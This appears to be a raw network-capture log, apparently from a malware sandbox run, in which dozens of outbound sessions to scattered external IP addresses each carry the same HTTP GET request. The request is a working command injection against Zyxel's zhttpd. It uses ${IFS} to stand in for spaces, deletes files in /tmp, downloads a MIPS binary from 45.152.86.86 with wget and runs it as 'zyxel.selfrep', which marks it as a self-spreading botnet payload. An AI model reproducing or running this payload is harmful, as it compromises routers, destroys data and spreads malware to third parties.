                              Mar 31, 2024 08:41:58.225860119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7602192.168.2.134197831.227.116.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.225925922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7603192.168.2.133418067.127.208.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.225992918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7604192.168.2.1346396178.102.70.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.226058960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7605192.168.2.1359470188.238.184.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.226116896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7606192.168.2.1350814108.65.79.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.226169109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7607192.168.2.1338910123.95.101.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.226253033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7608192.168.2.1333580174.187.155.99443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.226324081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7609192.168.2.1358934106.126.241.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:58.226392031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7610192.168.2.1333534131.191.184.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.225680113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7611192.168.2.133920019.119.81.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.225709915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7612192.168.2.1339498154.95.186.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.225733042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7613192.168.2.135606894.163.185.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.225791931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7614192.168.2.1358730131.235.16.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.225825071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7615192.168.2.134281434.140.244.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.225846052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7616192.168.2.1336412161.20.185.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.225898981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7617192.168.2.134303618.109.115.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.225955009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7618192.168.2.1355774190.156.245.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.225976944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7619192.168.2.1338054119.239.8.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226001978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7620192.168.2.134278414.141.161.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226047039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7621192.168.2.133624850.119.153.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226074934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7622192.168.2.134216881.220.33.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226106882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7623192.168.2.1358262142.152.61.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226130962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7624192.168.2.1332966154.45.197.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226182938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7625192.168.2.135363042.193.23.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226205111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7626192.168.2.1336644205.65.135.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226248026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7627192.168.2.1352038128.137.144.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226257086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7628192.168.2.134041050.195.117.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226311922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7629192.168.2.133573669.34.158.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226344109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7630192.168.2.1360926130.69.224.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226366043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7631192.168.2.135317435.220.34.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226425886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7632192.168.2.1334430181.208.120.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226443052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7633192.168.2.1342264162.130.246.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226458073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7634192.168.2.135142485.115.196.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226485014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7635192.168.2.1341114119.66.15.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226532936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7636192.168.2.134523419.43.102.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226551056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7637192.168.2.1358914137.114.43.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226574898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7638192.168.2.1336142118.165.137.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226644993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7639192.168.2.1356990168.110.213.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226675034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7640192.168.2.1348664126.185.103.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226702929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7641192.168.2.1332984149.173.168.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226757050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7642192.168.2.1340954202.133.42.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226784945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7643192.168.2.13524765.119.120.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226805925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7644192.168.2.1340462194.1.108.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226824999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7645192.168.2.133629461.142.232.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226841927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7646192.168.2.133729869.81.197.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226886988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7647192.168.2.134833219.30.3.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226931095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7648192.168.2.134200046.254.217.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226938009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7649192.168.2.134117645.151.172.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.226964951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7650192.168.2.1333952177.83.137.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227003098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7651192.168.2.1357278130.38.114.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227055073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7652192.168.2.133909291.87.186.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227083921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7653192.168.2.133793625.63.137.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227132082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7654192.168.2.1341772141.191.140.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227174997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7655192.168.2.1348688204.176.27.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227190018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7656192.168.2.1336922173.33.60.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227233887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7657192.168.2.1358964207.90.60.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227278948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7658192.168.2.133675499.42.44.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227307081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7659192.168.2.1350366112.169.250.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227315903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7660192.168.2.1336886129.11.165.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227355957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7661192.168.2.134885818.113.98.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227368116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7662192.168.2.1344434168.88.47.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227394104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7663192.168.2.135904688.55.232.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227453947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7664192.168.2.134091653.166.84.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227480888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7665192.168.2.1358540169.68.5.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227510929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7666192.168.2.1348304197.127.188.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227564096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7667192.168.2.133535261.51.122.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227576971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7668192.168.2.133321078.50.115.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227613926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7669192.168.2.133927880.250.4.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:59.227638960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7670192.168.2.1349692164.80.156.205443
                              TimestampBytes transferredDirectionData
